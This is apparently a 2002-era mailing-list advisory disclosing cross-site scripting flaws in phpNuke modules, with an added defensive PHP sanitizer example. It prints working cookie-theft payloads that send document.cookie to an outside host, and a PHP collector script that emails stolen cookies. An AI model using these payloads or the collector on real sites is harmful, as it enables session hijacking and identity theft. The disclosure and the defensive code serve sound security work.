Message-ID: <003401c293e4$92bece80$e62d1c41@kc.rr.com>
From: mattmurphy at kc.rr.com (Matthew Murphy)
Subject: Multiple phpNuke Modules Vulnerable to Cross-Site Scripting
phpNuke Module Vulnerabilities Enable Identity Theft
Systems Affected: phpNuke 6.5b1 and prior (all operating systems)
Risk: High
Impact: Identity Theft/Impersonation/Privilege Elevation
Scenario: Cross-site scripting flaws enabling cookie theft
Description
phpNuke is a popular and very complex content manager that runs on Unix,
Mac, and Windows systems with a MySQL or similar backend database. Many of
the content manager's modules contain serious vulnerabilities that allow
attackers to hijack or disable user accounts, and possibly gain
administrative privileges. Gaining such privileges could likely assist
further compromise of the susceptible system.
I. Search Module Vulnerability
The search module of phpNuke applies no filtering at all to the search
string when returning the "Results for x..." page, and as a result is
susceptible to cross-site scripting via a simple query such as:
<SCRIPT>location.href="http://www.techie.hopto.org/fetch.php?email=mattmurphy@...rr.com&ref="+document.URL+"cookie="+document.cookie;</SCRIPT>
II. Multiple Module Extended Tag Vulnerabilities
phpNuke does a decent job of stripping known malicious tags, but does not
take into account that even "safe" tags can carry malicious attributes.
This enables cross-site scripting against the PM module, the Discussion
module, the News module, and so on: essentially any module that accepts
user input for an article, message, or comment can be attacked with HTML
such as:
<B STYLE="left:expression(eval('location.href=\'http://www.techie.hopto.org/fetch.php?email=mattmurphy@...rr.com&ref=\'+document.URL+\'cookie=\'+document.cookie'))">Bold text -- or an attack?</B>
<B ONCLICK="location.href='http://www.techie.hopto.org/fetch.php?email=mattmurphy@...rr.com&ref='+document.URL+'cookie='+document.cookie">Don't Click</B>
<B ONMOUSEOVER="location.href='http://www.techie.hopto.org/fetch.php?email=mattmurphy@...rr.com&ref='+document.URL+'cookie='+document.cookie">Keep Away!</B>
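The following is an added example written for this page; it is not code from the advisory or from phpNuke. It shows the two defensive changes that sections I and II call for: encoding the search string at output time instead of echoing it raw, and filtering user-supplied HTML by attribute rather than only by tag name, so that an allowed tag such as <B> cannot carry an ONCLICK, ONMOUSEOVER or STYLE expression. The function names, the tag allowlist and the sample inputs are assumptions chosen for illustration.

```php
<?php
// Added example, not phpNuke's own code. Function names and the allowlists
// below are assumptions for illustration.

// Section I: the search module echoes the query back unencoded. Encoding it
// at output time turns "<SCRIPT>" into inert text in the results heading.
function render_search_heading(string $query): string
{
    $safe = htmlspecialchars($query, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return "Results for {$safe}...";
}

// Section II: stripping known-bad tags is not enough, because an allowed tag
// can still carry an event handler or a style expression. This filter keeps
// a small set of tags and, on those, only explicitly allowlisted attributes.
function sanitize_user_html(string $html): string
{
    $allowed_tags  = ['b', 'i', 'u', 'p', 'br', 'a'];
    $allowed_attrs = ['a' => ['href']];

    // Drop every tag not in the allowlist (this removes <script> outright).
    // strip_tags keeps the attributes of the tags it leaves in place.
    $html = strip_tags($html, '<' . implode('><', $allowed_tags) . '>');

    // Rebuild each remaining opening tag, keeping only allowlisted attributes.
    $html = preg_replace_callback(
        '/<([a-zA-Z]+)(\s[^>]*)?>/',
        function (array $m) use ($allowed_attrs): string {
            $tag   = strtolower($m[1]);
            $attrs = $m[2] ?? '';
            $kept  = '';
            if (isset($allowed_attrs[$tag])) {
                // Match name="value", name='value' or bare name=value pairs.
                preg_match_all(
                    '/([a-zA-Z-]+)\s*=\s*("[^"]*"|\'[^\']*\'|[^\s>]+)/',
                    $attrs, $pairs, PREG_SET_ORDER
                );
                foreach ($pairs as $p) {
                    $name  = strtolower($p[1]);
                    $value = trim($p[2], "\"'");
                    if (!in_array($name, $allowed_attrs[$tag], true)) {
                        continue; // drops onclick, onmouseover, style, ...
                    }
                    // Only http(s) URLs are accepted in href.
                    if ($name === 'href' && !preg_match('#^https?://#i', $value)) {
                        continue;
                    }
                    $kept .= ' ' . $name . '="'
                           . htmlspecialchars($value, ENT_QUOTES, 'UTF-8') . '"';
                }
            }
            // Tags without an attribute allowlist (b, i, u, p, br) lose all
            // attributes, which is what defeats the payloads in section II.
            return '<' . $tag . $kept . '>';
        },
        $html
    );

    // Normalise closing tags to lower case so the output is consistent.
    return preg_replace_callback(
        '#</([a-zA-Z]+)\s*>#',
        function (array $m): string { return '</' . strtolower($m[1]) . '>'; },
        $html
    );
}

// Constructed sample inputs modelled on the advisory's payloads; the host
// name is a placeholder.
echo render_search_heading('<SCRIPT>alert(document.cookie)</SCRIPT>'), "\n";
echo sanitize_user_html(
    '<B ONMOUSEOVER="location.href=\'http://attacker.invalid/\'">Keep Away!</B>'
), "\n";
echo sanitize_user_html(
    '<A HREF="javascript:alert(1)" ONCLICK="alert(2)">link</A> <I STYLE="left:expression(alert(3))">x</I>'
), "\n";
```

The first call returns the heading with the angle brackets encoded, so the browser renders the query as text. The second returns a plain <b> element with the event handler removed, and the third returns an <a> with neither attribute and an <i> with the style expression gone. A regex-based filter like this is deliberately simple and has known limits (for instance a `>` inside a quoted attribute value cuts the tag match short), so a production deployment should use a maintained parser-based sanitizer; the point here is that the decision has to be made per attribute, not per tag. Independently of filtering, marking the session cookie HttpOnly keeps document.cookie from exposing it to a script that does get through.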
III. Exploit Script
<?php
error_reporting(0);
$redir_ref = TRUE;
mail($_GET["email"], "phpNuke Cookie", $_GET["cookie"]);
if ($redir_ref) {
header("Location: ".urlencode($_GET["ref"]));
}
?>
Vendor Response
I've contacted www.phpnuke.org through a private message, but if anyone
knows a more reliable contact for them, please do use it, as this is not
likely the only route of contact. I sent a PM to "nukelite" with an example
exploit in it. I expect that future BETA releases will eliminate this
vulnerability. I am submitting this to the list so that vulnerable
administrators may make the necessary revisions to prevent this
vulnerability. The versions available for download on www.phpnuke.org, as
well as the version deployed there, remain vulnerable at the time of this
writing.